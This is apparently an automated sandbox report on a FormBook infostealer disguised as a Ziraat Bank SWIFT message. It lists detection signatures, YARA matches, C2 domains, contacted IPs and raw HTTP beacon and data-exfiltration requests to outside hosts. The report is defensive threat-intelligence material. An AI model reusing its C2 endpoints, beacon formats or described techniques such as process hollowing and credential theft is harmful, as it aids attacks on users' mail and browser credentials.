Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ziraat Bankasi Swift Mesaji20221121.exe

Overview

General Information

Sample Name:Ziraat Bankasi Swift Mesaji20221121.exe
Analysis ID:750683
MD5:775849a9c9b3cbfd14a9920690f62859
SHA1:aaaa3339aea81358088b6ac6ba82ad1032128e98
SHA256:f7f25e706279b7b590b49e40358db78ce5e8a3d65b765de97a7c964a81bf8881
Tags:exeFormbookgeoTURZiraatBank
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Ziraat Bankasi Swift Mesaji20221121.exe (PID: 2852 cmdline: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe MD5: 775849A9C9B3CBFD14A9920690F62859)
    • Ziraat Bankasi Swift Mesaji20221121.exe (PID: 60 cmdline: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe MD5: 775849A9C9B3CBFD14A9920690F62859)
      • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 2876 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
  • cleanup
{"C2 list": ["www.erwgcb.top/qmpa/"]}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6611:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a0b9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac31:$sqlite3step: 68 34 1C 7B E1
    • 0x1a0fb:$sqlite3text: 68 38 2A 90 C5
    • 0x1ac76:$sqlite3text: 68 38 2A 90 C5
    • 0x1a112:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1ac8c:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 20 entries
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Ziraat Bankasi Swift Mesaji20221121.exeReversingLabs: Detection: 28%
      Source: Yara matchFile source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: http://www.multimediapages.com/qmpa/?3f-T6nI=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61fgMLb8wiC572LGglGnkN+mkNWG&j6=hfNTAvira URL Cloud: Label: malware
      Source: http://www.oaksinstitute.net/qmpa/?3f-T6nI=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImnXlyB2HME2hA2u33jFcxbHUjt&j6=hfNTAvira URL Cloud: Label: malware
      Source: http://www.thetrendsinfo.com/qmpa/?3f-T6nI=8j1KE/HWtHcnH+pEPE5HkfDOmxDyQ368aF2j+bbJwew9gPbmW2dVDlZv4ybx5W4m8jPtBYTEvz/PBOnDTGQZn8CJHCh1MhyDPKi16ua84ged&j6=hfNTAvira URL Cloud: Label: malware
      Source: http://www.multimediapages.com/qmpa/Avira URL Cloud: Label: malware
      Source: http://www.oaksinstitute.net/qmpa/Avira URL Cloud: Label: malware
      Source: http://www.thetrendsinfo.com/qmpa/Avira URL Cloud: Label: malware
      Source: Ziraat Bankasi Swift Mesaji20221121.exeJoe Sandbox ML: detected
      Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.erwgcb.top/qmpa/"]}
      Source: Ziraat Bankasi Swift Mesaji20221121.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: Ziraat Bankasi Swift Mesaji20221121.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000003.262531212.00000000016D4000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000003.260023357.0000000001542000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000003.375312551.0000000004350000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.512812391.000000000460F000.00000040.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000003.372564961.00000000041B4000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.511277119.00000000044F0000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Ziraat Bankasi Swift Mesaji20221121.exe, Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000003.262531212.00000000016D4000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000003.260023357.0000000001542000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000003.375312551.0000000004350000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.512812391.000000000460F000.00000040.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000003.372564961.00000000041B4000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.511277119.00000000044F0000.00000040.00000800.00020000.00000000.sdmp

      Networking

      barindex
      Source: C:\Windows\explorer.exeDomain query: www.thetrendsinfo.com
      Source: C:\Windows\explorer.exeNetwork Connect: 68.66.216.12 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.notarpucarhr.com
      Source: C:\Windows\explorer.exeDomain query: www.oaksinstitute.net
      Source: C:\Windows\explorer.exeNetwork Connect: 103.11.189.189 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.multimediapages.com
      Source: C:\Windows\explorer.exeNetwork Connect: 141.136.43.229 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 38.239.92.131 80Jump to behavior
      Source: Malware configuration extractorURLs: www.erwgcb.top/qmpa/
      Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
      Source: global trafficHTTP traffic detected: GET /qmpa/?3f-T6nI=EgIWtG18ZIzAqtaO1OmvkFLdPjhKt8Mp7J5Y1fxWkEB6Q9kPLkR881s923Q+G4W9S+aNob6MQv0YuDJ73eh9wGmaMy0jmQVwd4+wO+lCGFJf&j6=hfNT HTTP/1.1Host: www.notarpucarhr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /qmpa/?3f-T6nI=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61fgMLb8wiC572LGglGnkN+mkNWG&j6=hfNT HTTP/1.1Host: www.multimediapages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /qmpa/?3f-T6nI=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImnXlyB2HME2hA2u33jFcxbHUjt&j6=hfNT HTTP/1.1Host: www.oaksinstitute.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /qmpa/?3f-T6nI=8j1KE/HWtHcnH+pEPE5HkfDOmxDyQ368aF2j+bbJwew9gPbmW2dVDlZv4ybx5W4m8jPtBYTEvz/PBOnDTGQZn8CJHCh1MhyDPKi16ua84ged&j6=hfNT HTTP/1.1Host: www.thetrendsinfo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 103.11.189.189 103.11.189.189
      Source: global trafficHTTP traffic detected: POST /qmpa/ HTTP/1.1Host: www.multimediapages.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.multimediapages.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.multimediapages.com/qmpa/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 2d 54 36 6e 49 3d 6d 63 4c 7a 7a 6c 6c 51 57 77 75 6a 4d 66 4c 6f 52 70 77 35 65 38 31 69 78 38 6d 58 62 51 5a 4c 73 6e 4b 42 38 44 67 6b 55 49 61 68 7a 49 4e 62 6e 6d 30 59 79 36 4e 37 54 33 76 33 72 6d 6a 76 4f 51 46 68 31 6d 33 6f 76 73 4f 62 52 57 69 70 78 6d 37 42 4a 65 6d 4c 79 44 61 4f 34 47 6a 5a 70 43 75 66 75 35 76 6e 6c 6f 37 78 30 70 79 2d 46 48 63 41 49 30 37 47 71 70 72 4a 54 36 4c 38 55 5f 45 6e 51 5f 28 48 66 38 64 59 50 71 62 30 78 31 7e 62 55 79 6f 4b 33 4e 37 6e 65 30 72 50 57 41 61 34 45 39 45 35 36 6c 7a 70 49 7a 55 4d 76 42 77 70 39 4e 63 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f-T6nI=mcLzzllQWwujMfLoRpw5e81ix8mXbQZLsnKB8DgkUIahzINbnm0Yy6N7T3v3rmjvOQFh1m3ovsObRWipxm7BJemLyDaO4GjZpCufu5vnlo7x0py-FHcAI07GqprJT6L8U_EnQ_(Hf8dYPqb0x1~bUyoK3N7ne0rPWAa4E9E56lzpIzUMvBwp9Nc.
      Source: global trafficHTTP traffic detected: POST /qmpa/ HTTP/1.1Host: www.oaksinstitute.netConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.oaksinstitute.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.oaksinstitute.net/qmpa/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 2d 54 36 6e 49 3d 30 61 48 4d 32 53 52 43 32 57 74 51 34 71 63 70 31 61 68 6c 38 43 63 78 6f 4f 6a 79 36 71 30 6a 28 53 62 46 31 42 42 5a 37 53 32 58 54 6c 79 6e 37 48 64 32 67 63 61 5a 4f 6f 7e 34 36 44 61 42 57 6c 52 4d 54 49 42 67 36 41 41 75 45 43 4b 33 5a 37 36 6e 62 45 53 67 34 30 67 31 35 7a 74 4b 74 6e 7a 76 4e 6f 42 6c 4f 45 53 30 6d 46 45 5a 56 59 47 65 6d 57 70 67 4c 65 42 6a 65 2d 62 39 76 71 50 59 42 50 7e 34 38 4a 48 50 49 6b 69 73 6c 63 62 4f 74 44 6d 64 62 6f 73 59 6a 61 55 64 6e 6e 6e 76 33 46 51 64 7e 59 37 75 39 54 78 41 6a 47 50 48 4a 42 34 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f-T6nI=0aHM2SRC2WtQ4qcp1ahl8CcxoOjy6q0j(SbF1BBZ7S2XTlyn7Hd2gcaZOo~46DaBWlRMTIBg6AAuECK3Z76nbESg40g15ztKtnzvNoBlOES0mFEZVYGemWpgLeBje-b9vqPYBP~48JHPIkislcbOtDmdbosYjaUdnnnv3FQd~Y7u9TxAjGPHJB4.
      Source: global trafficHTTP traffic detected: POST /qmpa/ HTTP/1.1Host: www.thetrendsinfo.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.thetrendsinfo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thetrendsinfo.com/qmpa/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 2d 54 36 6e 49 3d 78 68 64 71 48 4c 6d 55 68 58 6f 42 4e 65 46 51 50 7a 51 4e 34 63 75 77 6a 30 57 4d 51 56 7e 65 46 6c 61 76 34 4b 6e 66 77 50 67 72 28 50 32 6e 54 30 30 54 55 6b 67 59 39 41 32 77 77 47 45 70 36 79 33 77 42 37 69 4b 73 78 33 35 43 2d 37 6a 57 31 30 67 6f 38 53 68 4f 53 46 73 4c 67 54 75 4b 59 28 4c 36 62 79 43 30 58 44 30 75 56 46 69 56 75 73 50 49 69 54 71 6e 43 35 46 4e 45 6f 6c 52 6f 35 67 67 4a 4e 70 61 4d 72 31 6c 33 63 43 48 48 6a 51 52 66 71 59 30 36 41 42 42 34 78 4d 6a 59 35 71 79 6b 55 57 45 66 39 6f 73 66 41 31 78 7a 37 77 4e 76 73 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f-T6nI=xhdqHLmUhXoBNeFQPzQN4cuwj0WMQV~eFlav4KnfwPgr(P2nT00TUkgY9A2wwGEp6y3wB7iKsx35C-7jW10go8ShOSFsLgTuKY(L6byC0XD0uVFiVusPIiTqnC5FNEolRo5ggJNpaMr1l3cCHHjQRfqY06ABB4xMjY5qykUWEf9osfA1xz7wNvs.
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 21 Nov 2022 09:59:14 GMTserver: LiteSpeedx-xss-protection: 1; mode=blockx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 21 Nov 2022 09:59:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 33 63 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 54 5b 6f 1a 47 14 7e f7 af 98 ee 93 fd 00 03 8e 23 b9 74 d9 0a 1b 24 23 d9 8d 9b 90 56 7e 24 5c cc b6 c0 a2 65 12 5a 45 91 c0 89 0b 98 8b 89 8d 9d d8 59 9a d8 b2 1b d7 4e 16 47 69 31 e1 52 ff 97 64 67 76 79 f2 5f e8 59 96 52 b9 aa f2 b0 b3 3b 73 ce 9c ef 9c ef 3b 67 f9 2f bc b7 e6 03 2b cb 3e b4 10 58 5a 44 cb 77 e7 16 fd f3 88 b3 61 fc fd 8d 79 8c bd 01 af 65 98 b1 3b 9c 18 fb be e1 10 17 23 24 e5 c2 38 93 c9 d8 33 37 ec 92 bc 8a 03 b7 71 8c 24 e2 33 38 4d 64 31 44 ec 61 12 e6 84 09 de 8c 28 f0 0b 3e 8f 57 e0 03 fe c0 a2 4f 60 6b 27 4c 39 35 0e cf 58 b5 c0 1a 8f d9 cb 63 5d 29 19 cd e3 c1 c1 9f 3c b6 5c 26 f8 25 5f c0 03 a0 81 65 9b ef db bb fe ef dc dc bc 94 24 91 24 b1 05 7e 4e 45 38 34 da b9 39 12 f9 89 0c 71 bf 42 a1 58 50 4e 47 88 fb 3e 89 da 66 4d e8 3b 81 95 45 1f 22 70 61 e4 17 4a a7 e1 1c a1 b9 5b de 15 f4 10 45 21 a4 0b 7d 99 22 d8 39 9d 22 88 aa 25 ad bf 8d 1e 81 c3 82 73 6c 36 4d d8 79 f3 3f f6 e9 cf 5e f7 b8 e2 62 f2 47 70 09 49 71 49 76 21 39 12 1e 86 f5 b8 1e 88 69 91 c0 6e 6c 4a 04 65 49 4a 82 95 c7 c3 74 21 6d 6c 91 65 26 09 94 79 e6 a0 86 8c 18 26 31 f7 4d 87 03 dd 93 e4 70 44 76 3b 50 28 12 8f a7 53 c1 90 98 5c 75 3b 1d e0 78 1b 1e 2f 5c 8f 39 3f cf 30 d8 27 40 02 ad 5d a1 eb 17 f4 28 af f5 2f f5 fa 09 2b 66 d9 66 4d fb eb 85 be ff 84 e6 df b2 8a 3a d6 45 7f a1 d2 fe 0e 2b ec 82 40 60 05 c9 06 7b b5 4f d9 35 80 92 01 2f 25 18 cd 0b 7a de 30 9a 3b 5a f7 58 6b 97 d8 76 45 eb 2b 57 bd 7d 1e a7 c0 7e 3f 0e 4b 5c 14 e8 6f 6b ec 57 05 90 0d f5 48 6b 77 8c fc 29 bd 78 47 3b 75 50 de 78 dc a7 47 2f ff 17 70 d0 38 bc ea 95 01 41 6b 57 f5 fe 53 fd 6c 4f 57 0f f4 da 2f f4 e9 73 23 57 d7 df 77 21 11 1e 43 78 0b a3 b2 43 f3 5d 3e 88 62 72 24 ea e6 7e 08 3e 08 a6 43 b2 98 22 ae b8 14 0a 12 51 4a da e5 48 5c 0a 86 27 a7 38 81 16 2e d8 ee 39 8f 83 02 2b 17 07 5b 2a e0 d0 0f 2d 8b 0e ba de d2 ba bb 16 11 83 7c 05 6a fb 17 07 0f 2b 8a 4d 0b 66 7b a2 41 7d cf 68 36 d1 8c c3 69 77 22 1b 82 ce d6 bb 9b 56 67 03 05 86 7a 39 78 a6 ea f5 77 5a a7 3a a2 f5 d9 2b b6 53 30 bb bf b4 a5 77 1b 66 d8 7b b2 e0 87 e6 96 93 11 82 b4 cb 03 96 6b 32 a5 42 37 0e d0 a4 df 7f 67 8a c7 00 35 e6 9a 6d 64 99 d2 b4 bc ae 7a 05 20 d2 3a 61 f5 26 2b e7 b4 4e 07 88 b1 84 bc ea 15 af 0b 60 f4 df d0 c2 39 1a b3 33 1a e1 55 c9 9e 10 43 b2 94 96 a2 c4 1e 92 12 38 9a 31 bb 17 7f 6d ae 62 d8 3d eb 9c 75 70 c2 d2 3f 2e 48 eb bc a6 db 39 0b cf ca d3 a4 10 98 63 35 45 ff e3 90 96 d7 59 e9 cd c7 ac 62 b2 f3 31 db a0 5b 65 d8 00 3d f0 6d 76 cf ab fc e0 f0 f9 35 d1 58 71 9b f6 b2 e0 04 d5 22 da 56 e9 c6 ef e0 0b c5 d1 cd 26 55 4e 90 79 3c 12 7d ef 04 4d 8a 40 53 62 55 9e 42 5a fb ad 45 2f 54 0a da e9 4f 5a b4 56 b5 92 b0 50 80 1c 88 6a 74 ce b4 6e 7f 70 0a 4d 94 83 b8 9f b2 b0 2a d6 45 56 7d 4d 0b ad 71 92 74 fd 3d c8 64
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 21 Nov 2022 09:59:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 35 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e e6 82 a8 e6 9c aa e8 a2 ab e6 8e 88 e6 9d 83 e6 9f a5 e7 9c 8b e8 af a5 e9 a1 b5 3c 2f 54 49 54 4c 45 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 e5 ae 8b e4 bd 93 20 7d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0a 3c 2f 53 54 59 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0a 3c 68 31 3e e6 82 a8 e6 9c aa e8 a2 ab e6 8e 88 e6 9d 83 e6 9f a5 e7 9c 8b e8 af a5 e9 a1 b5 3c 2f 68 31 3e 0a e6 82 a8 e4 b8 8d e5 85 b7 e5 a4 87 e4 bd bf e7 94 a8 e6 89 80 e6 8f 90 e4 be 9b e7 9a 84 e5 87 ad e6 8d ae e6 9f a5 e7 9c 8b e8 af a5 e7 9b ae e5 bd 95 e6 88 96 e9 a1 b5 e7 9a 84 e6 9d 83 e9 99 90 e3 80 82 0a 3c 68 72 3e 0a 3c 70 3e e8 af b7 e5 b0 9d e8 af 95 e4 bb a5 e4 b8 8b e6 93 8d e4 bd 9c ef bc 9a 3c 2f 70 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e e5 a6 82 e6 9e 9c e6 82 a8 e8 ae a4 e4 b8 ba e8 87 aa e5 b7 b1 e5 ba 94 e8 af a5 e8 83 bd e5 a4 9f e6 9f a5 e7 9c 8b e8 af a5 e7 9b ae e5 bd 95 e6 88 96 e9 a1 b5 e9 9d a2 ef bc 8c e8 af b7 e4 b8 8e e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e8 81 94 e7 b3 bb e3 80 82 3c 2f 6c 69 3e 0a 3c 6c 69 3e e5 8d 95 e5 87 bb 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 